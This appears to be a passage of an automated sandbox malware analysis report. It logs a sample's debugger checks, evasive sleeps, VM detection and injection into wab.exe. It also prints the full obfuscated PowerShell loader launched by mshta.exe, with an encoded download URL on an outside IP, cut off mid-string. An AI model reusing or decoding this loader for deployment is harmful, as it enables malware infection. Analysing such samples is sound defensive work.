Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6342 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3439 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7813
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1748
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3209 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4324 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5784 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2848 Thread sleep count: 7813 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2848 Thread sleep count: 1748 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2804 Thread sleep count: 3209 > 30 Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 3209 delay: -5 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 10_2_22C910F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C96580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA, 10_2_22C96580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW, 16_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 19_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 22_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00418981 memset,GetSystemInfo, 16_2_00418981
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: mshta.exe, 00000000.00000003.2009239128.0000000002C07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000001.00000002.2806985847.00000000073F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll G
Source: svchost.exe, 00000003.00000002.3227073694.0000021BB3E56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3224868475.0000021BAE82B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C96ACB GetCPInfo,LdrInitializeThunk, 10_2_22C96ACB
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C92639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_22C92639
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 16_2_004044A4
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C94AB4 mov eax, dword ptr fs:[00000030h] 10_2_22C94AB4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C9724E GetProcessHeap, 10_2_22C9724E
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C92639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_22C92639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C92B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_22C92B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_22C960E2

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3AC0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 1CFB20
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. 